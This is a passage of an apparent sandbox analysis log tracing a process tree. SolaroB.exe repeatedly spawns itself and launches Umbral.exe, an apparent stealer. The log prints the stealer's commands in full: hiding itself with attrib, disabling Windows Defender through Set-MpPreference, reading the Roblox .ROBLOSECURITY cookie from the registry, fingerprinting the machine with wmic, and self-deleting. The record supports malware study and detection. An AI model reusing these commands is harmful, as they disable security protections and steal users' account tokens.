        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:812
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        25⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1016
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        31⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        32⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        33⤵
        Executes dropped EXE
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        34⤵
        Checks computer location settings
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        35⤵
        Checks computer location settings
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        36⤵
        Checks computer location settings
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        37⤵
        Checks computer location settings
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        38⤵
        Checks computer location settings
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        39⤵
        Checks computer location settings
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        40⤵
        Checks computer location settings
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        41⤵
        Checks computer location settings
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        42⤵
        Checks computer location settings
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        43⤵
        Checks computer location settings
        
        PID:376
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        44⤵
        Checks computer location settings
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        45⤵
        Checks computer location settings
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        46⤵
        Checks computer location settings
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        47⤵
        Checks computer location settings
        
        PID:984
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        48⤵
        Checks computer location settings
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        49⤵
        Checks computer location settings
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        50⤵
        Checks computer location settings
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        51⤵
        Checks computer location settings
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        52⤵
        Checks computer location settings
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        53⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        54⤵
        Checks computer location settings
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        55⤵
        Checks computer location settings
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        56⤵
        Checks computer location settings
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        57⤵
        Checks computer location settings
        
        PID:1896
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        58⤵
        Checks computer location settings
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        59⤵
        Checks computer location settings
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        60⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        61⤵
        Checks computer location settings
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        62⤵
        Checks computer location settings
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        63⤵
        Checks computer location settings
        
        PID:3616
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        64⤵
        Checks computer location settings
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        65⤵
        Checks computer location settings
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        66⤵
        Checks computer location settings
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        67⤵
        Checks computer location settings
        
        PID:3552
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        68⤵
        Checks computer location settings
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        69⤵
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        69⤵
        
        PID:4040
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        70⤵
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        68⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        67⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        66⤵
        Drops file in Drivers directory
        
        PID:4452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        67⤵
        
        PID:2696
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        67⤵
        Views/modifies file attributes
        
        PID:3552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        67⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        67⤵
        
        PID:3484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        67⤵
        
        PID:4376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        67⤵
        
        PID:1888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        67⤵
        
        PID:3088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        67⤵
        
        PID:3308
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        67⤵
        
        PID:1028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        67⤵
        
        PID:432
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        67⤵
        Detects videocard installed
        
        PID:3700
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        67⤵
        
        PID:2900
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        68⤵
        Runs ping.exe
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        65⤵
        
        PID:3356
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        64⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        63⤵
        Drops file in Drivers directory
        
        PID:3036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        64⤵
        
        PID:4440
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        64⤵
        Views/modifies file attributes
        
        PID:2416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        64⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        64⤵
        
        PID:2676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        64⤵
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        64⤵
        
        PID:4452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        64⤵
        
        PID:4312
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        64⤵
        
        PID:3376
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        64⤵
        
        PID:3224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        64⤵
        
        PID:4472
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        64⤵
        Detects videocard installed
        
        PID:628
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        64⤵
        
        PID:876
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        65⤵
        Runs ping.exe
        
        PID:808
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        62⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        61⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        60⤵
        Drops file in Drivers directory
        
        PID:2488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        61⤵
        
        PID:3376
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        61⤵
        Views/modifies file attributes
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        61⤵
        
        PID:1012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        
        PID:4476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        61⤵
        
        PID:1480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        61⤵
        
        PID:3092
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        61⤵
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        61⤵
        
        PID:4988
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        61⤵
        Detects videocard installed
        
        PID:556
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        61⤵
        
        PID:3136
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        62⤵
        Runs ping.exe
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        59⤵
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        58⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        57⤵
        Drops file in Drivers directory
        
        PID:2368
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:2656
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        58⤵
        Views/modifies file attributes
        
        PID:4336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        58⤵
        
        PID:4804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:5084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:4272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        58⤵
        
        PID:1956
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        58⤵
        
        PID:1360
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:4336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        58⤵
        
        PID:556
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        58⤵
        Detects videocard installed
        
        PID:4452
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        58⤵
        
        PID:2972
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        59⤵
        Runs ping.exe
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        56⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        55⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        54⤵
        Drops file in Drivers directory
        
        PID:2392
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:2812
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        55⤵
        Views/modifies file attributes
        
        PID:4600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        55⤵
        
        PID:3664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:4916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        55⤵
        
        PID:2448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        55⤵
        
        PID:220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        55⤵
        
        PID:1628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        55⤵
        Detects videocard installed
        
        PID:552
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        55⤵
        
        PID:4552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:3664
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        56⤵
        Runs ping.exe
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        53⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        51⤵
        Drops file in Drivers directory
        
        PID:4348
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:948
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        Views/modifies file attributes
        
        PID:3588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        52⤵
        
        PID:2188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:1484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        52⤵
        
        PID:4904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        52⤵
        
        PID:4044
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        52⤵
        
        PID:1992
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        52⤵
        Detects videocard installed
        
        PID:856
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        52⤵
        
        PID:1820
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        53⤵
        Runs ping.exe
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        48⤵
        Drops file in Drivers directory
        
        PID:1664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:4348
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        Views/modifies file attributes
        
        PID:2968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
